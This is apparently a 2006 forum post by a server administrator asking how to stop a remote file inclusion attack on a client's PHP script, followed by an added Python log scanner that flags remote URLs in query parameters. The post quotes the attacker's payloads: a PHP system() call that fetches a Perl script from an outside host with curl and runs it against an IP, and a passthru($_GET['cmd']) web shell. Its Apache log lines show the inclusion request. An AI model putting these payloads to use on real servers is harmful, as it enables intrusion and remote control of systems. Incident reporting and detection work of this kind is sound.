Hi!
A hacker is uploading shell scripts to /tmp on one server through a client's PHP script.
The way he is doing this is by going to my client's index2.php file and then adding a command at the end so it will query/go to a file placed on another server.
This file is called m.gif, but it's not an image; it's PHP commands in the file.
You can probably see it live by going to the URLs in the log below.
Anyway - any idea on how to stop this?
Disable a function in PHP maybe, but hopefully none that will affect other clients.
Or a mod_sec rule maybe.
I have blocked his IP of course, as well as the server the PHP commands are on.
m.gif=
<?
system("cd /tmp;curl -o cb maka.home.ro/cb;perl cb 140.128.101.1 80");
?>
pass.gif=
<?
passthru($_GET['cmd']);
?>
/usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET /index2.php?title=PageTitle&page=http://maka.home.ro/m.gif? HTTP/1.1" 200 3478 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
/usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET /gfx/5x5.gif HTTP/1.1" 404 - "http://xxx.domain.com/index2.php?title=PageTitle&page=http://maka.home.ro/m.gif?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
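Added example, not part of the original post: a Python scan of Apache access-log lines for query parameters whose value is a remote URL, which is the pattern in the logged index2.php request, so that other scripts on the same server receiving such requests can be found. The function name and the second and third sample lines are constructed for illustration; only IPv4 client addresses are recognised.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside an Apache combined-format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# IPv4 client address, optionally preceded by the "logfile:" prefix grep adds
CLIENT_RE = re.compile(r'^(?:\S+:)?(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) ')
# A parameter value that is itself a remote URL is the inclusion indicator
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)


def find_remote_includes(lines):
    """Return (client_ip, path, param, value) for every request whose
    query string carries a remote URL as a parameter value."""
    hits = []
    for line in lines:
        req = REQUEST_RE.search(line)
        if not req:
            continue  # not an access-log entry, or a wrapped fragment
        client = CLIENT_RE.match(line)
        ip = client.group("ip") if client else "?"
        target = urlsplit(req.group("target"))
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                hits.append((ip, target.path, name, value))
    return hits


# First entry is the request logged in the post; the other two are constructed.
SAMPLE = [
    '/usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - '
    '[03/May/2006:07:07:24 +0200] "GET /index2.php?title=PageTitle'
    '&page=http://maka.home.ro/m.gif? HTTP/1.1" 200 3478 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '192.0.2.10 - - [03/May/2006:07:08:00 +0200] '
    '"GET /index2.php?title=PageTitle&page=news HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.11 - - [03/May/2006:07:09:00 +0200] '
    '"GET /view.php?inc=ftp%3A%2F%2Fexample.com%2Fx.txt HTTP/1.1" 200 90 "-" "-"',
]

if __name__ == "__main__":
    for ip, path, name, value in find_remote_includes(SAMPLE):
        print(f"{ip} {path} parameter {name!r} -> {value}")
```

Each hit names the script and the parameter that accepted the URL, which is where the include needs to be restricted to a fixed set of local pages.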